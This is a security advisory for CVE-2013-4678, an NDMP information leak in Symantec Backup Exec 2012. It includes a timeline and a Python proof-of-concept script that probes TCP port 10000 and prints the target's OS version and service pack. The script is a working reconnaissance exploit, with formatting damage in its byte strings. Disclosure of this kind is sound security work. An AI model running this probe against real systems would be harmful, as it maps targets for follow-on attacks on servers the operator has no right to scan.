Symantec Backup Exec 2012 – OS version and service pack information leak
Summary
Name: Symantec Backup Exec 2012 – OS version and service pack information leak
Release Date: 2 October 2013
Reference: NGS00344
Discoverer: Andy Davis
Vendor: Symantec
CVE Reference: CVE-2013-4678
Systems Affected: Symantec Backup Exec 2012
Risk: Medium
Status: Published
TimeLine
Discovered: 18 July 2012
Released: 18 July 2012
Approved: 18 July 2012
Reported: 18 July 2012
Fixed: 1 August 2013
Published: 30 September 2013
Description
The NDMP protocol leaks version information about the underlying OS that
Backup Exec is installed upon. This information could be useful to an
attacker, who is trying to exploit another service on the server for which
OS version information is specifically required (this is often the case of
memory corruption bugs)
Technical Details
NDMP (Network Data Management Protocol) is an open standard protocol for
enterprise-wide backup of heterogeneous network-attached storage. It
listens on TCP Port 10000
The PoC below demonstrates the information leak.
C:>ndmp.py 10.33.33.141
————————–
Backup Exec NDMP info leak
————————–
WIN2K3-R2-ENT
Windows NTMajor Version=5 Minor Version=2 Build Number=3790 ServicePack
Major=2 ServicePack Minor=0 SuiteMask=274 ProductType=3 ProcessorType=Intel x8610.33.33.141
#!/usr/local/bin/python
import sys
from socket import *
import os
import time
if (len(sys.argv)!=2):
print “n————————–“
print “Symantec Backup Exec NDMP info leak”
print “Andy Davis, NCC Group 2013”
print “Usage: ndmp.py <target IP>”
print “————————–n”
exit(0)
host=sys.argv[1]
port=10000
data = [‘x80x00x00x1cx00x00x00x01Dxa4xdex07x00x00x00x00x00x00x01x03x00x00x00
x00x00x00x00x00x00x00x00x02′,’x80x00x004x00x00x00x02Dxa4xdex07x00x00x00x00
x00x00tx01x00x00x00x00x00x00x00x00x00x00x00x02x00x00x00x04root}(xe5nxcdx1bk
xaexd6xe8x1cpuxccx9dxa4′,’x80x00x00x18x00x00x00x03Dxa4xde.x00x00x00x00x00x00
x01x00x00x00x00x00x00x00x00x00′]
output = “”
print “n————————–”
print “Backup Exec NDMP info leak”
print “————————–n”
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
x = 0
while (x < len(data)):
time.sleep(0.01)
try:
s.send(data[x])
except:
print “failed to send”
pass
time.sleep(0.01)
try:
out = s.recv(1024)
if x == 2:
y = 35
while y < len(out):
if ord(out[y]) > 31 and ord(out[y]) < 127 or ord(out[y]) == 10 or ord(out[y]) == 13:
output += out[y]
y+=1
except:
pass
print “failed to receive”
x+=1
print output
s.close()
Fix Information
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory pvid=security_advisory year= suid=20130801_00